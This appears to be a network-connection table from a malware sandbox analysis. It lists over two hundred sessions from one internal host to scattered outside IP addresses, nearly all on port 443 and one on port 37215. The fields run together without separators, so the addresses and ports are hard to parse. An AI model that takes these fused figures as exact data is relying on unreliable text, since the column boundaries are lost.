                                                18362192.168.2.2339574145.30.58.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18363192.168.2.2339934202.56.93.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18364192.168.2.234167067.38.124.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18365192.168.2.234002650.124.187.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18366192.168.2.233849437.219.36.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18367192.168.2.2342078165.94.13.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18368192.168.2.2359270162.53.175.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18369192.168.2.233832299.73.231.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18370192.168.2.234351454.25.99.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18371192.168.2.234028234.52.99.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18372192.168.2.235569432.34.79.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18373192.168.2.2350336122.199.155.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18374192.168.2.235925669.135.87.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18375192.168.2.2340102179.244.208.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18376192.168.2.2360516106.115.224.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18377192.168.2.2332960184.219.151.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18378192.168.2.2357682172.62.48.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18379192.168.2.2347666169.83.146.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18380192.168.2.233620496.177.134.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18381192.168.2.234247696.40.165.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18382192.168.2.235974253.111.254.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18383192.168.2.2349088120.125.248.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18384192.168.2.2348916119.88.208.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18385192.168.2.2360860216.158.193.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18386192.168.2.2344490212.71.138.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18387192.168.2.2333600145.252.239.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18388192.168.2.233322885.176.50.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18389192.168.2.233996853.169.134.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18390192.168.2.234389485.8.32.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18391192.168.2.2355636115.24.40.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18392192.168.2.2339656106.149.70.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18393192.168.2.2358020119.150.155.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18394192.168.2.2340356105.156.44.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18395192.168.2.2335472122.59.101.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18396192.168.2.235865494.137.130.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18397192.168.2.235595284.195.25.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18398192.168.2.234701666.193.244.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18399192.168.2.2357846213.221.64.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18400192.168.2.2345720194.197.122.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18401192.168.2.2352648171.19.195.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18402192.168.2.234753676.55.239.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18403192.168.2.2340466144.139.181.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18404192.168.2.234748270.36.36.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18405192.168.2.2338528197.109.59.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18406192.168.2.2346684188.122.175.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18407192.168.2.2343144184.52.94.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18408192.168.2.2354034138.209.224.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18409192.168.2.236058472.166.180.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18410192.168.2.2342120145.47.162.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18411192.168.2.2336306110.181.136.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18412192.168.2.2360650194.247.135.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18413192.168.2.2360926174.171.51.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18414192.168.2.2339590221.223.104.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18415192.168.2.2340236134.83.76.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18416192.168.2.233402659.82.115.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18417192.168.2.2352220182.41.199.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18418192.168.2.234116438.197.46.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18419192.168.2.2357406199.216.74.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18420192.168.2.2358260165.156.55.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18421192.168.2.235800018.226.163.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18422192.168.2.2333780134.177.102.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18423192.168.2.2334428170.118.222.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18424192.168.2.233415642.119.83.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18425192.168.2.2346082119.45.67.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18426192.168.2.2352590176.25.86.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18427192.168.2.2346558210.14.150.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18428192.168.2.2345604219.38.137.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18429192.168.2.235229017.90.139.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18430192.168.2.2346748145.155.50.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18431192.168.2.233517820.68.163.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18432192.168.2.2346854138.90.195.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18433192.168.2.2353420146.47.115.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18434192.168.2.235724461.194.145.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18435192.168.2.234806240.39.110.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18436192.168.2.2341808202.226.177.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18437192.168.2.234875812.103.72.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18438192.168.2.2355720185.106.118.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18439192.168.2.2343712151.157.155.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18440192.168.2.234940837.1.253.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18441192.168.2.235940635.237.5.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18442192.168.2.2352512111.62.53.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18443192.168.2.234626899.78.39.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18444192.168.2.236019462.65.170.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18445192.168.2.2356984149.99.224.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18446192.168.2.2342184185.5.152.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18447192.168.2.2360802223.90.202.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18448192.168.2.234794864.218.206.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18449192.168.2.2359058162.96.204.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18450192.168.2.234463234.192.60.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18451192.168.2.234412043.92.27.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18452192.168.2.234654645.108.18.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18453192.168.2.234257265.158.78.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18454192.168.2.2347118118.5.163.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18455192.168.2.2351478133.161.62.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18456192.168.2.2335280205.47.226.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18457192.168.2.2349794184.49.37.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18458192.168.2.2336792151.41.34.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18459192.168.2.2356798114.177.28.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18460192.168.2.235898491.22.245.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18461192.168.2.2356768190.98.64.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18462192.168.2.235717460.196.55.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18463192.168.2.2335008131.58.135.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18464192.168.2.2333694102.29.101.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18465192.168.2.2338262144.116.34.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18466192.168.2.23536045.98.181.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18467192.168.2.235779837.84.80.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18468192.168.2.233714231.184.181.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18469192.168.2.233279470.42.234.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18470192.168.2.2338484106.86.198.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18471192.168.2.235580679.198.61.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18472192.168.2.2337168193.158.223.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18473192.168.2.2354068180.167.38.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18474192.168.2.23586602.202.75.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18475192.168.2.2346090152.216.124.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18476192.168.2.234326231.118.34.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18477192.168.2.23540361.151.246.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18478192.168.2.235690836.198.47.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18479192.168.2.234864252.131.26.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18480192.168.2.2346894182.19.120.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18481192.168.2.2357432141.26.218.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18482192.168.2.2356968177.247.5.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18483192.168.2.234019886.52.7.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18484192.168.2.2356514139.173.225.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18485192.168.2.2342468156.191.214.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18486192.168.2.235299475.240.121.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18487192.168.2.2346848123.194.136.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18488192.168.2.234904291.56.253.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18489192.168.2.2355634179.255.118.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18490192.168.2.2344014213.255.81.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18491192.168.2.235074461.207.129.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18492192.168.2.2338454191.137.120.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18493192.168.2.2344044167.98.231.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18494192.168.2.2356820165.106.55.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18495192.168.2.2338524216.72.59.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18496192.168.2.2341378165.154.103.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18497192.168.2.233993861.154.174.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18498192.168.2.235807881.127.33.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18499192.168.2.2357356143.207.132.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18500192.168.2.234542893.60.11.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18501192.168.2.2333228153.226.68.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18502192.168.2.2340898106.137.98.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18503192.168.2.233904460.196.241.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18504192.168.2.235705694.122.89.17137215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18505192.168.2.233977643.147.6.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18506192.168.2.2351874138.94.104.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18507192.168.2.2335004194.237.170.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18508192.168.2.2347610162.163.209.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18509192.168.2.235169480.179.44.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18510192.168.2.2350224130.200.89.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18511192.168.2.2349128207.54.3.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18512192.168.2.2357012152.62.180.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18513192.168.2.234403287.215.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18514192.168.2.234708673.132.209.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18515192.168.2.2350624201.0.168.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18516192.168.2.2353560151.157.239.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18517192.168.2.234834012.124.137.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18518192.168.2.2340638196.222.85.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18519192.168.2.23503942.254.222.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18520192.168.2.235376060.215.235.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18521192.168.2.2346052125.58.106.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18522192.168.2.23514125.211.159.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18523192.168.2.234165654.207.73.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18524192.168.2.2332872167.62.51.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18525192.168.2.2347300219.129.179.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18526192.168.2.2352330167.145.195.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18527192.168.2.235502454.18.142.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18528192.168.2.2350032182.168.116.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18529192.168.2.2334572206.12.144.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18530192.168.2.236068618.222.233.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18531192.168.2.2360680129.192.0.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18532192.168.2.233627225.123.189.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18533192.168.2.234117238.206.9.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18534192.168.2.2335892102.111.147.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18535192.168.2.2333848145.71.214.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18536192.168.2.2351310113.86.241.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18537192.168.2.2356890121.103.116.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18538192.168.2.2351600121.67.147.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18539192.168.2.2338132220.149.101.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18540192.168.2.2334404141.166.16.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18541192.168.2.2336012120.236.216.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18542192.168.2.2357116210.50.108.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18543192.168.2.2358844117.233.100.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18544192.168.2.2359660194.15.122.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18545192.168.2.234951451.137.120.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18546192.168.2.233597632.152.179.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18547192.168.2.2357764222.132.153.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18548192.168.2.235789627.104.25.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18549192.168.2.233834250.53.145.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18550192.168.2.234611418.16.26.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18551192.168.2.2337632209.112.44.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18552192.168.2.2350874180.216.233.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18553192.168.2.2354334168.15.131.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18554192.168.2.234854831.182.18.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18555192.168.2.2343672161.114.0.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18556192.168.2.235163675.214.208.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18557192.168.2.234569477.76.198.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18558192.168.2.2354444185.65.26.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18559192.168.2.234496231.72.251.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18560192.168.2.234302034.80.33.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18561192.168.2.233923036.183.8.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18562192.168.2.233485686.210.7.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18563192.168.2.2341516130.237.95.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18564192.168.2.234457066.36.183.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18565192.168.2.2335074122.2.81.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18566192.168.2.2334714202.133.26.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18567192.168.2.2354594186.56.75.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18568192.168.2.2346668154.91.40.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18569192.168.2.2334738104.233.70.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18570192.168.2.2350816126.95.147.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18571192.168.2.2349418221.222.207.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18572192.168.2.2343934156.239.200.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18573192.168.2.2345492200.244.124.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18574192.168.2.2360916179.22.192.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18575192.168.2.2334594198.131.171.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18576192.168.2.2351330222.244.121.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18577192.168.2.2333638207.74.145.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18578192.168.2.2354150182.39.38.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18579192.168.2.2350046145.83.97.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18580192.168.2.236019270.247.178.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18581192.168.2.2339652172.134.79.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18582192.168.2.234856838.119.111.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18583192.168.2.235930475.199.146.18443
                                                TimestampBytes transferredDirectionData


